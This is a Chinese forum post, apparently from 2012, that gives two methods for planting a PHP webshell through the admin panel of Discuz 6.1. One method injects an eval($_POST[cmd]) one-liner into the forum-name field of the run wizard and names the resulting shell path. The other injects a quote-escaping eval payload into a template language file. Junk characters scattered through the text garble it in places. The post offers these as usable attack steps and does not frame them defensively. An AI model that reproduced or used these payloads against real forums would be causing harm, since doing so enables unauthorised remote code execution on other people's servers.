discuz6.1两种方法后台拿shell
& P c9 Y& E4 E3 [4 Q, t. U好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下& d( Y5 z* p! d V
1:
0 c9 j G, F9 P4 E" m V7 G( ?http://127.0.0.1/discuz/admincp. ... zard&frames=yes" R+ k* m: M( n5 ~$ B
admincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell
& M3 E* T5 t) F R# s) b<?php eval($_POST[cmd]);?>
- V E) {3 w: \5 p$ l后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php4 Z0 I; T; p# ^' p t5 @4 @3 k# y
1 K$ m6 Q6 d6 R# \! ^
# c* e$ i# o# p. Q" `2:后台模板管理--默认模板套系--详情
: K7 |& k! g6 ?9 D: E- Qtemplates/default/actions.lang.php/ H$ e. ]2 l3 B3 v; Z2 S1 O, M; ?
jhackj\\');eval($_POST[cmd])?>;//
2 n9 t1 V5 _4 q( M+ F4 @, \1 `8 r4 s
利用很简单,聪明的人一看就懂了 |
发表于 2012-9-13 16:59:17
收藏
支持
反对